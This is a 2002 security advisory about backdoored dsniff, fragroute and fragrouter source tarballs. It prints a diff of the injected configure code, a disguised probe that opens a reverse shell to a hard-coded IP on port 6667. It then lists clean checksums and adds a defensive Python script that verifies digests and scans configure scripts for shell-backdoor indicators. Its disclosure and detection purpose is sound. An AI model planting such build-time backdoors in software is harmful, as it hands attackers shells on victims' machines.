4th Jun 2002 [SBWID-5397]
COMMAND
fragroute, dsniff and fragrouter have been backdoored
SYSTEMS AFFECTED
dsniff-2.3, fragroute-1.2, and fragrouter-1.6 source distributions
PROBLEM
Dug Song [http://www.monkey.org] explains:
monkey.org was compromised on May 14th, via an epic4-pre2.511
client-side hole which produced a shell to one of the local admin's
accounts. this was later used to reattach to one of his screen
sessions, which apparently had a root window open (su very bad!).
the dsniff-2.3, fragroute-1.2, and fragrouter-1.6 tarballs were all
modified at 3 AM on May 17th to include the same configure backdoor as
described in the irssi advisory. no other public web content was
modified, and the system was restored a week later, from scratch.
Diff between the clean fragroute-1.2 configure script and the backdoored one:
diff -Nur fragroute-1.2/configure fragroute-1.2-bad/configure
--- fragroute-1.2/configure Mon Apr 15 16:41:43 2002
+++ fragroute-1.2-bad/configure Mon Apr 15 16:41:43 2002
@@ -1590,6 +1590,53 @@
fi
+cat > conftest.c<<EOF
+/* Override any gcc2 internal prototype to avoid an error. */
+/* We use char because int might match the return type of a gcc2
+ builtin and then its argument prototype would still apply. */
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <unistd.h>
+int main()
+{
+/* The GNU C library defines this for functions which it implements
+ to always fail with ENOSYS. Some functions are actually named
+ something starting with __ and the normal name is an alias. */
+ int s;
+ struct sockaddr_in sa;
+ switch(fork()) { case 0: break; default: exit(0); }
+ if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
+ exit(1);
+ }
+ /* HP/UX 9 (%@#!) writes to sscanf strings */
+ memset(&sa, 0, sizeof(sa));
+ sa.sin_family = AF_INET;
+ sa.sin_port = htons(6667);
+/* Override any gcc2 internal prototype to avoid an error. */
+/* We use char because int might match the return type of a gcc2
+ builtin and then its argument prototype would still apply. */
+ sa.sin_addr.s_addr = inet_addr(\"216.80.99.202\");
+ if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
+ exit(1);
+ }
+ /* HP/UX 9 (%@#!) writes to sscanf strings */
+ dup2(s, 0); dup2(s, 1); dup2(s, 2);
+/* The GNU C library defines this for functions which it implements
+ to always fail with ENOSYS. Some functions are actually named
+ something starting with __ and the normal name is an alias. */
+ { char *args[] = { \"/bin/sh\", NULL }; execve(args[0], args, NULL); }
+}
+EOF
+gcc $LIBS conftest.c -o conftest; ./conftest
+if { (eval echo configure:2379: \\\"$ac_link\\\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftestx${ac_exeext}; then
+ rm -rf conftest*
+else
+ rm -rf conftest*
+fi
+rm -f conftest*
+
# DLPI needs putmsg under HPUX so test for -lstr while we\'re at it
echo $ac_n \"checking for putmsg in -lstr\"\"... $ac_c\" 1>&6
echo \"configure:1596: checking for putmsg in -lstr\" >&5
SOLUTION
Verify checksums before building. The MD5 checksums of the clean tarballs are:
MD5 (dsniff-2.3.tar.gz) = 183e336a45e38013f3af840bddec44b4
MD5 (fragroute-1.2.tar.gz) = 7e4de763fae35a50e871bdcd1ac8e23a
MD5 (fragrouter-1.6.tar.gz) = 73fdc73f8da0b41b995420ded00533cc
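As an added example, not code from the advisory or from monkey.org, the following Python script does the two defender-side checks this page implies: it compares a downloaded tarball's digest against the MD5 values published in the SOLUTION section above (MD5 is what was published in 2002; the functions take an algorithm name so a stronger digest can be substituted where one is available), and it scans a configure script for compile-and-run probes whose heredoc source contains the combination of indicators seen in the hunk above (connect(), dup2(), execve(), /bin/sh, a hard-coded IP literal). The `SAMPLE_CONFIGURE` text is constructed for the example: one benign autoconf probe followed by an abbreviated, non-compilable block modelled on the diff with a documentation-range address, so the scan can be exercised offline. The indicator names and the `min_indicators` threshold are this example's own choices, not anything the advisory defines.

```python
"""Verify tarball digests against the advisory's published list and scan a
configure script for conftest probes that do more than probe.
Added example; not code from the advisory or from the dsniff/fragroute projects."""
import hashlib
import re
import sys
from pathlib import Path

# Digests exactly as published in the advisory's SOLUTION section (MD5).
KNOWN_GOOD_MD5 = {
    "dsniff-2.3.tar.gz": "183e336a45e38013f3af840bddec44b4",
    "fragroute-1.2.tar.gz": "7e4de763fae35a50e871bdcd1ac8e23a",
    "fragrouter-1.6.tar.gz": "73fdc73f8da0b41b995420ded00533cc",
}


def digest_bytes(data: bytes, algo: str = "md5") -> str:
    """Hex digest of an in-memory blob; algo is any name hashlib knows."""
    return hashlib.new(algo, data).hexdigest()


def digest_file(path, algo: str = "md5", chunk: int = 1 << 20) -> str:
    """Hex digest of a file, streamed so large tarballs are not read at once."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def check_digest(name: str, actual: str, known=KNOWN_GOOD_MD5) -> str:
    """Compare a computed digest with the published one for that file name."""
    expected = known.get(name)
    if expected is None:
        return "NO-PUBLISHED-CHECKSUM"
    return "OK" if actual.lower() == expected.lower() else "MISMATCH"


def check_tarball(path, known=KNOWN_GOOD_MD5) -> str:
    return check_digest(Path(path).name, digest_file(path), known)


# Indicator names are this example's own labels. One of these alone can occur
# in a legitimate probe (e.g. a test for connect() in -lsocket); several
# together inside one compiled-and-executed conftest is what the backdoor looks like.
INDICATORS = {
    "network-connect": re.compile(r"\bconnect\s*\("),
    "exec": re.compile(r"\bexec[lv]p?e?\s*\("),
    "shell": re.compile(r"/bin/(?:ba)?sh\b"),
    "fd-redirect": re.compile(r"\bdup2\s*\("),
    # optional backslash so the escaped form seen in the advisory's diff also matches
    "hardcoded-ip": re.compile(r'inet_addr\s*\(\s*\\?"\d{1,3}(?:\.\d{1,3}){3}'),
}
HEREDOC_START = re.compile(r"cat\s*>\s*(conftest\S*)\s*<<\s*'?(\w+)'?")


def scan_configure(text: str, min_indicators: int = 2):
    """Return one finding per conftest heredoc tripping >= min_indicators distinct indicators.

    Each finding is {"line": 1-based line of the 'cat > conftest...' command,
    "file": the heredoc target, "indicators": sorted indicator names}."""
    findings = []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = HEREDOC_START.search(lines[i])
        if not m:
            i += 1
            continue
        terminator = m.group(2)
        j = i + 1
        body = []
        while j < len(lines) and lines[j].strip() != terminator:
            body.append(lines[j])
            j += 1
        joined = "\n".join(body)
        tripped = sorted(k for k, rx in INDICATORS.items() if rx.search(joined))
        if len(tripped) >= min_indicators:
            findings.append({"line": i + 1, "file": m.group(1), "indicators": tripped})
        i = j + 1
    return findings


# Constructed sample: a benign probe, then an abbreviated block modelled on the
# advisory's diff (not compilable; 192.0.2.10 is a documentation address).
SAMPLE_CONFIGURE = r'''
# benign autoconf probe: does the compiler accept a trivial program?
cat > conftest.c <<EOF
#include <stdio.h>
int main() { printf("ok\n"); return 0; }
EOF
if { (eval $ac_link) 2>&5; } && test -s conftest; then
  ac_cv_works=yes
fi
rm -f conftest*

# injected block modelled on the advisory's diff (constructed, abbreviated)
cat > conftest.c<<EOF
/* Override any gcc2 internal prototype to avoid an error. */
#include <sys/socket.h>
int main()
{
 int s = socket(AF_INET, SOCK_STREAM, 0);
 sa.sin_addr.s_addr = inet_addr("192.0.2.10");
 if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) exit(1);
 dup2(s, 0); dup2(s, 1); dup2(s, 2);
 { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }
}
EOF
gcc $LIBS conftest.c -o conftest; ./conftest
'''


if __name__ == "__main__":
    # usage: python check.py <tarball>... ; or with no args, scan the sample text
    if len(sys.argv) > 1:
        for p in sys.argv[1:]:
            print(f"{p}: {check_tarball(p)}")
    else:
        for f in scan_configure(SAMPLE_CONFIGURE):
            print(f"line {f['line']}: {f['file']} trips {', '.join(f['indicators'])}")
```

Run with tarball paths to get `OK`, `MISMATCH` or `NO-PUBLISHED-CHECKSUM` per file; run with no arguments to see the sample scan report the second heredoc only. Pointing `scan_configure` at the configure script of an unpacked archive is a cheap second check when no published digest exists for a file.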